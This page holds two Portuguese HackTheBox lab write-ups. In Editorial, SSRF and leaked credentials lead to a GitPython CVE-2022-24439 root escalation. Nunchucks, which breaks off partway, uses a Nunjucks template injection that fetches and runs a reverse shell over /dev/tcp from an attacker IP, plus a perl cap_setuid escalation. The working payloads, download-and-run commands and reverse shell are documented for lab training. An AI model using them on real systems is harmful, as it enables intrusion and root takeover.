DEV Community: Guilherme Martins

HackTheBox - Writeup Editorial [Retired]

Guilherme Martins — Sat, 19 Oct 2024 19:50:30 +0000

Neste writeup iremos explorar uma máquina easy linux chamada Editorial. Esta máquina explora as seguintes vulnerabilidades e técnicas de exploração:

Server-side request forgery (SSRF)
Information Leaked
Git hacktricks
CVE-2022-24439 - Remote Code Execution (RCE)

Recon e user flag

Vamos iniciar realizando uma varredura em nosso alvo a procure de portas abertas utilizando nmap:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/boardlight]
└─# nmap -sS --open -Pn 10.129.115.37
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-15 15:06 EDT
Nmap scan report for 10.129.115.37 (10.129.115.37)
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Temos a porta 22 rodando o ssh e a porta 80 rodando um servidor http.
Acessando a porta 80 através do ip somos redirecionados para editorial.htb, vamos adicionar esse host em nosso /etc/hosts.

Com isso conseguimos acessar o seguinte conteúdo:

O site se trata de uma editora de livros. Dentre as opções disponíveis encontramos a seguinte página:

Aqui conseguimos enviar livros para que sejam enviados livros para a editora. O envio pode ser feito de duas formas, realizando o upload de um arquivo localmente ou através de uma url.

Ao enviar um arquivo somos redirecionados para um endpoint similar a este:

http://editorial.htb/static/uploads/0483497c-293d-44a4-87af-46a85f20cb60 Acessando a url é feito o download do arquivo que enviamos anteriormente em forma de pdf.

Analisando as duas opções encontramos um SSRF ao informar um url local, enviando a seguinte url como payload: http://127.0.0.1:5000

Com isso realizamos o download do arquivo e temos o seguinte conteúdo em formato json:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/editorial]
└─# jq . requests-result/0483497c-293d-44a4-87af-46a85f20cb60
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

Aqui temos diversos endpoints que podemos explorar, para isso vamos utilizar o burp suite (que ja esta sendo executado em background) para realizar novas requisições.
Vamos focar inicialmente no endpoint /api/latest/metadata/messages/authors que tem a seguinte função: Retrieve the welcome message sended to our new authors

POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------346249403126403154753644150452
Content-Length: 401
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload

-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000/api/latest/metadata/messages/authors
-----------------------------346249403126403154753644150452
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------346249403126403154753644150452--

Com isso temos o seguinte retorno:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 51

static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f

Agora vamos realizar um get request para este endpoint:

GET /static/uploads/413c49ad-8adb-4bbb-9579-8a13e870ff5f HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://editorial.htb/upload

E assim temos o seguinte retorno:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Jun 2024 11:53:42 GMT
Content-Type: application/octet-stream
Content-Length: 506
Connection: close
Content-Disposition: inline; filename=413c49ad-8adb-4bbb-9579-8a13e870ff5f
Last-Modified: Sat, 22 Jun 2024 11:53:31 GMT
Cache-Control: no-cache
ETag: "1719057211.219647-506-4209449183"

{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

Temos novamente um retorno em formato json. Neste temos uma mensagem de boas vindas para novos autores e também um usuário e senha:
Username: dev
Password: dev080217_devAPI!@

Com este usuário e senha conseguimos acesso ssh ao nosso alvo:

┌──(root㉿kali)-[/home/kali]
└─# ssh dev@editorial.htb
The authenticity of host 'editorial.htb (10.129.101.138)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editorial.htb' (ED25519) to the list of known hosts.
dev@editorial.htb's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jun 22 11:54:05 AM UTC 2024

  System load:           0.0
  Usage of /:            60.4% of 6.35GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.129.101.138
  IPv6 address for eth0: dead:beef::250:56ff:feb0:6c4b


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$

E com este usuário conseguimos a user flag!

dev@editorial:~$ ls -a
.  ..  apps  .bash_history  .bash_logout  .bashrc  .cache  .profile  user.txt
dev@editorial:~$ cat user.txt
389072ccb7be77e63a1590defe01750e

Escalação de privilégios e root flag

No diretório home do usuário dev temos um diretório chamado apps. Acessando este diretório temos o seguinte conteúdo:

dev@editorial:~/apps$ ls -alh
total 12K
drwxrwxr-x 3 dev dev 4.0K Jun  5 14:36 .
drwxr-x--- 4 dev dev 4.0K Jun  5 14:36 ..
drwxr-xr-x 8 dev dev 4.0K Jun  5 14:36 .git

Existe somente um diretório chamado .git. O diretório .git registra todas as alterações em um projeto, registrando toda a história do projeto.
Com isso conseguimos visualizar o histórico de commits:

dev@editorial:~/apps$ git log
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 21:04:21 2023 -0500

    fix: bugfix in api port endpoint

commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 21:01:11 2023 -0500

    change: remove debug and update api port

commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev

    * To use development environment.

commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:51:10 2023 -0500

    feat: create api to editorial info

    * It (will) contains internal info about the editorial, this enable
       faster access to information.

commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:48:43 2023 -0500

    feat: create editorial app

    * This contains the base of this project.
    * Also we add a feature to enable to external authors send us their
       books and validate a future post in our editorial.

Dentre os commits existe o seguinte:

commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev

    * To use development environment.

Foi feito um downgrade dos dados de produção para desenvolvimento, aqui podemos encontrar informações importantes.
Para visualizar o conteúdo deste commit vamos utilizar o comando git revert, que irá reverter as alterações e voltar o projeto para este commit:

dev@editorial:~/apps$ git revert b73481bb823d2d
Auto-merging app_api/app.py
[master 238ee48] Revert "change(api): downgrading prod to dev"
 1 file changed, 1 insertion(+), 1 deletion(-)
dev@editorial:~/apps$ ls -alh
total 16K
drwxrwxr-x 4 dev dev 4.0K Jun 22 12:10 .
drwxr-x--- 6 dev dev 4.0K Jun 22 12:10 ..
drwxrwxr-x 2 dev dev 4.0K Jun 22 12:10 app_api
drwxr-xr-x 8 dev dev 4.0K Jun 22 12:10 .git
dev@editorial:~/apps$ cd app_api/
dev@editorial:~/apps/app_api$ ls -alh
total 12K
drwxrwxr-x 2 dev dev 4.0K Jun 22 12:10 .
drwxrwxr-x 4 dev dev 4.0K Jun 22 12:10 ..
-rw-rw-r-- 1 dev dev 2.8K Jun 22 12:10 app.py

Temos um arquivo chamdo app.py, vamos visualizar o conteúdo dele:


dev@editorial:~/apps/app_api$ cat app.py
# API (in development).
# * To retrieve info about editorial

import json
from flask import Flask, jsonify

# -------------------------------
# App configuration
# -------------------------------
app = Flask(__name__)

# -------------------------------
# Global Variables
# -------------------------------
api_route = "/api/latest/metadata"
api_editorial_name = "Editorial Tiempo Arriba"
api_editorial_email = "info@tiempoarriba.htb"

# -------------------------------
# API routes
# -------------------------------
# -- : home
@app.route('/api', methods=['GET'])
def index():
    data_editorial = {
        'version': [{
            '1': {
                'editorial': 'Editorial El Tiempo Por Arriba',
                'contact_email_1': 'soporte@tiempoarriba.oc',
                'contact_email_2': 'info@tiempoarriba.oc',
                'api_route': '/api/v1/metadata/'
            }},
            {
            '1.1': {
                'editorial': 'Ed Tiempo Arriba',
                'contact_email_1': 'soporte@tiempoarriba.oc',
                'contact_email_2': 'info@tiempoarriba.oc',
                'api_route': '/api/v1.1/metadata/'
            }},
            {
            '1.2': {
                'editorial': api_editorial_name,
                'contact_email_1': 'soporte@tiempoarriba.oc',
                'contact_email_2': 'info@tiempoarriba.oc',
                'api_route': f'/api/v1.2/metadata/'
            }},
            {
            '2': {
                'editorial': api_editorial_name,
                'contact_email': 'info@tiempoarriba.moc.oc',
                'api_route': f'/api/v2/metadata/'
            }},
            {
            '2.3': {
                'editorial': api_editorial_name,
                'contact_email': api_editorial_email,
                'api_route': f'{api_route}/'
            }
        }]
    }
    return jsonify(data_editorial)

# -- : (development) mail message to new authors
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
    return jsonify({
        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
    }) # TODO: replace dev credentials when checks pass

# -------------------------------
# Start program
# -------------------------------
if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000)

Aqui temos endpoints similares ao que encontramos via SSRF inicialmente. A diferença é que os dados de acesso são de outro usuário:

Username: prod
Password: 080217_Producti0n_2023!@

Visualizando os usuários que temos em nosso alvo e que possuem um shell ativo, temos os seguintes usuários:

dev@editorial:~/apps$ grep bash /etc/passwd
root:x:0:0:root:/root:/bin/bash
prod:x:1000:1000:Alirio Acosta:/home/prod:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash

Existe um usuário chamado prod. Podemos utilizar essa nova senha para utilizar este usuário:

dev@editorial:~/apps$ su prod
Password: 
prod@editorial:/home/dev/apps$

Com o novo usuário podemos ver que conseguimos executar um script em python com sudo, o que nos garante permissões de root:

prod@editorial:~$ sudo -l
[sudo] password for prod:
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

O comando é para executar um script em python que aceita qualquer parâmetro, por conta do asterisco *.
Podemos visualizar o conteúdo do script para ver o que conseguimos executar:

prod@editorial:~$ cd /opt/internal_apps/clone_changes/
prod@editorial:/opt/internal_apps/clone_changes$ ls -alh
total 12K
drwxr-x--- 2 root     prod     4.0K Jun  5 14:36 .
drwxr-xr-x 5 www-data www-data 4.0K Jun  5 14:36 ..
-rwxr-x--- 1 root     prod      256 Jun  4 11:30 clone_prod_change.py
prod@editorial:/opt/internal_apps/clone_changes$ cat clone_prod_change.py
#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

Não temos permissões para editar o arquivo, somente executar. O script utiliza bibliotecas do python os e sys, que permite executar ações no linux.
O script aceita um parâmetro, para isso é utilizado a lib sys do python.
É feito uma troca de diretório para /opt/internal_apps/clone_changes utilizando a função chdir da lib os do python.

Agora utilizando outra lib do python chamada git é feito um git init, que inicializa um repositório.
O parâmetro que é aceito pelo script deve ser um repositório, para que seja feito um git clone utilizando esta mesma lib git.

Podemos buscar por vulnerabilidades nessa lib, para isso vamos precisar pegar a versão através do pip, que é um gerenciador de pacotes do python:

prod@editorial:/opt/internal_apps/clone_changes$ pip3 list | grep -i git
gitdb                 4.0.10
GitPython             3.1.29

Buscando por vulnerabilidades encontramos a CVE-2022-24439, que se trata de um Remote Code Execution devido a uma validação inadequada do input do usuário.
Esta vulnerabilidade foi relatada pela Snyk, que também disponibilizou uma PoC.

Podemos alterar a poc para ler arquivos como root ou elevar nosso acesso para root.

Para ler arquivos podemos executar o seguinte comando:

prod@editorial:/opt/internal_apps/clone_changes$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c cat% /root/root.txt% >% /tmp/root.txt"
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c cat% /root/root.txt% >% /tmp/root.txt new_changes
  stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
'
prod@editorial:/opt/internal_apps/clone_changes$ ls -a /tmp/
.           root.txt                                                                           .Test-unix
..          systemd-private-19d905d0323a421c8583b199cfdbc508-ModemManager.service-k9pcm7       tmux-1001
.font-unix  systemd-private-19d905d0323a421c8583b199cfdbc508-systemd-logind.service-OAF5Lb     vmware-root_793-4248746047
.ICE-unix   systemd-private-19d905d0323a421c8583b199cfdbc508-systemd-resolved.service-LyFZ7m   .X11-unix
pwned       systemd-private-19d905d0323a421c8583b199cfdbc508-systemd-timesyncd.service-Owf84r  .XIM-unix
prod@editorial:/opt/internal_apps/clone_changes$ cat /tmp/root.txt
3b41e79604a2b5ab7a462fe51e4491cc

E assim conseguimos ler a root flag.

Podemos também adicionar o sticky bit no arquivo /bin/bash, desta forma conseguimos ganhar um shell como root. O sticky bit permite que outros usuários possam utilizar o arquivo, ou binário com permissões do dono do arquivo, neste caso é o usuário root. Adicionando no /bin/bash conseguimos um shell como root:

prod@editorial:/home/dev/apps$ stat /bin/bash
  File: /bin/bash
  Size: 1396520         Blocks: 2728       IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 4694        Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-06-23 14:47:02.027998536 +0000
Modify: 2024-03-14 11:31:47.000000000 +0000
Change: 2024-06-05 14:36:10.952041259 +0000
 Birth: 2024-06-04 14:02:32.920041258 +0000

prod@editorial:/opt/internal_apps/clone_changes$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c chmod% u+s% /bin/bash"
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c chmod% u+s% /bin/bash new_changes
  stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
'
prod@editorial:/opt/internal_apps/clone_changes$ stat /bin/bash
  File: /bin/bash
  Size: 1396520         Blocks: 2728       IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 4694        Links: 1
Access: (4755/-rwsr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-06-22 09:39:01.331999178 +0000
Modify: 2024-03-14 11:31:47.000000000 +0000
Change: 2024-06-22 13:54:52.571329190 +0000
 Birth: 2024-06-04 14:02:32.920041258 +0000
prod@editorial:/opt/internal_apps/clone_changes$ /bin/bash -p
bash-5.1# id
uid=1000(prod) gid=1000(prod) euid=0(root) groups=1000(prod)

E assim finalizamos a máquina Editorial!

HackTheBox - Writeup Nunchucks [Retired]

Guilherme Martins — Sat, 08 Jun 2024 13:07:56 +0000

Hackthebox

Neste writeup iremos explorar uma máquina linux de nível easy que ja se encontra entre as máquinas aposentadas. Esta máquina aborda as seguintes vulnerabilidades:

Server Side Template Injection em aplicações NodeJS
Linux capabilities
Bypass Apparmor

Recon e user flag

Iniciaremos realizando uma varredura em nosso alvo a procura de portas abertas através do nmap:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/nunchucks]
└─# nmap -sV --open -Pn 10.129.95.252
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-27 10:28 EST
Nmap scan report for 10.129.95.252
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ao acessar via IP a porta 80 somos redirecionados para a porta 443 que possui HTTPS.

Vamos adicionar o domínio que retorna no certificado ssl nunchucks.htb em nosso /etc/hosts.

E ao acessarmos novamente temos a seguinte página:

Está pagina possui somente duas opções via api, login e register. No entanto não foram encontradas vulnerabilidades ou meios de exploração devido a opção estar desabilitada.

Vamos utilizar o gobuster para buscar subdomínios:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/nunchucks]
└─# wfuzz -H "Host: FUZZ.nunchucks.htb" -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hh 30587 https://nunchucks.htb
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: https://nunchucks.htb/
Total requests: 207630
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                 
=====================================================================
000000193:   200        101 L    259 W      4028 Ch     "store"

Localizamos o subdomínio store.nunchucks.htb, vamos adicionar em nosso /etc/hosts também. O novo subdomínio possui o seguinte conteúdo:

Existe um campo para assinatura de um newsletter e podemos constatar que o mesmo é vulnerável a SSTI (Server Side Template Injection):

Interceptando as requisições com o Burp Suite como proxy conseguimos testar diversos payloads para SSTI buscando execução de comandos.

No entanto, precisamos primeiro entender o que esta processando os dados que enviamos, qual o tipo de template que a aplicação esta usando.

Analisando as requisições e respostas através do burp suite encontramos o header X-Powered-By: Express

O Express é um framework web para NodeJS. E a partir daqui conseguimos visualizar os templates engine que o mesmo utiliza:

Template Engines

Dentre os templates temos o seguinte que nos chama atenção pelo seu nome:

https://github.com/mozilla/nunjucks

Aqui nosso foco se torna criar um payload que nos permite executar comandos em nosso alvo.

Conseguimos com a seguinte requisição:

POST /api/submit HTTP/1.1
Host: store.nunchucks.htb
Cookie: _csrf=ccjKRgyMzBCAko0I10C2MKXv
Content-Length: 128
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: https://store.nunchucks.htb
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://store.nunchucks.htb/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close

{"email":"{{range.constructor("return global.process.mainModule.require('child_process').execSync('curl 10.10.14.128:8081/test123')")()}}"}

Para testar o funcionamento iremos subir um servidor web utilizando python da seguinte forma e executar a requisição acima, tendo o seguinte retorno:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/nunchucks]
└─# python -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.129.95.252 - - [28/Jan/2024 07:54:40] code 404, message File not found
10.129.95.252 - - [28/Jan/2024 07:54:40] "GET /test123 HTTP/1.1" 404 -

Foi executado com sucesso um curl para nossa máquina, batendo no endpoint que não existe, retornando o status code 404.

Agora que temos um RCE podemos utilizar para realizar o download e executar nosso reverse shell, da mesma forma que o exemplo acima.

Iremos criar o arquivo chamado rev.sh com o seguinte conteúdo:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.128/9001 0>&1

Para realizar o download basta alterarmos nosso payload da seguinte forma:

{"email":"{{range.constructor("return global.process.mainModule.require('child_process').execSync('curl 10.10.14.128:8081/rev.sh -o /tmp/rev.sh')")()}}"}

E temos o retorno em nosso servidor web python que o alvo conseguiu encontrar o arquivo:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/nunchucks]
└─# python -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.129.95.252 - - [28/Jan/2024 07:54:40] code 404, message File not found
10.129.95.252 - - [28/Jan/2024 07:54:40] "GET /test123 HTTP/1.1" 404 -
10.129.95.252 - - [28/Jan/2024 07:57:52] "GET /rev.sh HTTP/1.1" 200 -

Com nosso reverse shell ja no alvo, através de uma aba do terminal iremos utilizar o pwncat para ouvir na porta 9001:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/nunchucks]
└─# pwncat-cs -lp 9001        
[07:55:13] Welcome to pwncat 🐈!

E iremos alterar nosso payload para executar nosso reverse shell, da seguinte forma:

{"email":"{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash /tmp/rev.sh')")()}}"}

Com estes passos conseguimos o seguinte retorno em nosso pwncat, com nosso shel reverso:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/nunchucks]
└─# pwncat-cs -lp 9001        
[07:55:13] Welcome to pwncat 🐈!                                                                                                          __main__.py:164
[07:58:30] received connection from 10.129.95.252:60400                                                                                        bind.py:84
[07:58:37] 10.129.95.252:60400: registered new host w/ db                                                                                  manager.py:957
(local) pwncat$                                                                                                                                          
(remote) david@nunchucks:/var/www/store.nunchucks$ id
uid=1000(david) gid=1000(david) groups=1000(david)

Conseguindo assim a user flag:

(remote) david@nunchucks:/var/www/store.nunchucks$ ls -alh /home/
total 12K
drwxr-xr-x  3 root  root  4.0K Aug 28  2021 .
drwxr-xr-x 19 root  root  4.0K Oct 28  2021 ..
drwxr-xr-x  7 david david 4.0K Oct 22  2021 david
(remote) david@nunchucks:/var/www/store.nunchucks$ ls -alh /home/david/
total 52K
drwxr-xr-x 7 david david 4.0K Oct 22  2021 .
drwxr-xr-x 3 root  root  4.0K Aug 28  2021 ..
lrwxrwxrwx 1 root  root     9 Aug 28  2021 .bash_history -> /dev/null
-rw-r--r-- 1 david david  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 david david 3.7K Feb 25  2020 .bashrc
drwxr-xr-x 7 david david 4.0K Sep 25  2021 .cache
drwx------ 8 david david 4.0K Sep 25  2021 .config
drwx------ 3 david david 4.0K Sep 25  2021 .gnupg
drwx------ 3 david david 4.0K Sep 25  2021 .local
drwxrwxr-x 5 david david 4.0K Jan 27 15:27 .pm2
-rw-r--r-- 1 david david  807 Feb 25  2020 .profile
-r--r----- 1 root  david   33 Jan 27 15:28 user.txt
-rw------- 1 david david 5.0K Oct 22  2021 .viminfo
(remote) david@nunchucks:/var/www/store.nunchucks$ cat /home/david/user.txt 
329cc9dd22d4499ac9302bb6a4ff8bab

Escalação de privilégios e root flag

Visando automatizar o processo de recon de nosso alvo, uma vez que temos um shell como usuário, vamos utilizar o linpeas.

O linpeas se trata de um script que realiza uma varredura no alvo levantando diversos pontos que possivelmente podem ser explorados para escalar privilégios, seja obter dados sensíveis, permissionamento, capabilities e diversos outros pontos.

Em nosso caso, dentre todas possibilidades que retornaram no output do script, temos o seguinte:

-rw-rw-r-- 1 root david 7651273 Sep 26  2021 /opt/web_backups/backup_2021-09-26-1632618416.tar
-rw-rw-r-- 1 root david 7651273 Sep 26  2021 /opt/web_backups/backup_2021-09-26-1632619104.tar
-rwxr-xr-x 1 root root 838 Sep  1  2021 /opt/backup.pl

É um script feito em perl que possui o seguinte conteúdo:

#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid); 
POSIX::setuid(0); 

my $tmpdir        = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";

sub printlog
{
    print "[", strftime("%D %T", localtime), "] $_[0]\n";
}

sub archive
{
    printlog "Archiving...";
    system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
    printlog "Backup complete in $tmpbdir/backup_$now.tar";
}

if ($> != 0) {
    die "You must run this script as root.\n";
}

printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";

O script realiza o backup de /var/www e salva o arquivo compactado em /opt/web_backups/.

Mas realizando o download do backup e visualizando o banco de dados (que também podemos acessar o atual) não foi encontrado nenhuma informação útil que possa ser utilizada para escalar privilégios. Existe o banco de dados da aplicação que é um sqlite, mas sem nada interessante também.

Outro ponto, que é o mais importante do output do linpeas é o seguinte:

Files with capabilities (limited to 50):
/usr/bin/perl = cap_setuid+ep

O binário do perl possui a capabilitie cap_setuid, que permite que seja setado o uid através do binário perl, permitindo usuários sem privilégios executarem (+ep).

setuid(2) - Linux manual page

Podemos testar a execução de alguns comandos utilizando o perl via linha de comando que ver o que conseguimos executar como root:

(remote) david@nunchucks:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

O comando acima, assim como o script de backup, seta o uid para 0, que é do usuário root e executa o /bin/bash para criar um novo shell como root. Mas sem sucesso.

Ao alterar o comando para whoami temos sucesso:

(remote) david@nunchucks:/tmp$ id
uid=1000(david) gid=1000(david) groups=1000(david)
(remote) david@nunchucks:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
root

Mas outros comandos para tentar executar um shell não funciona, como por exemplo o seguinte:

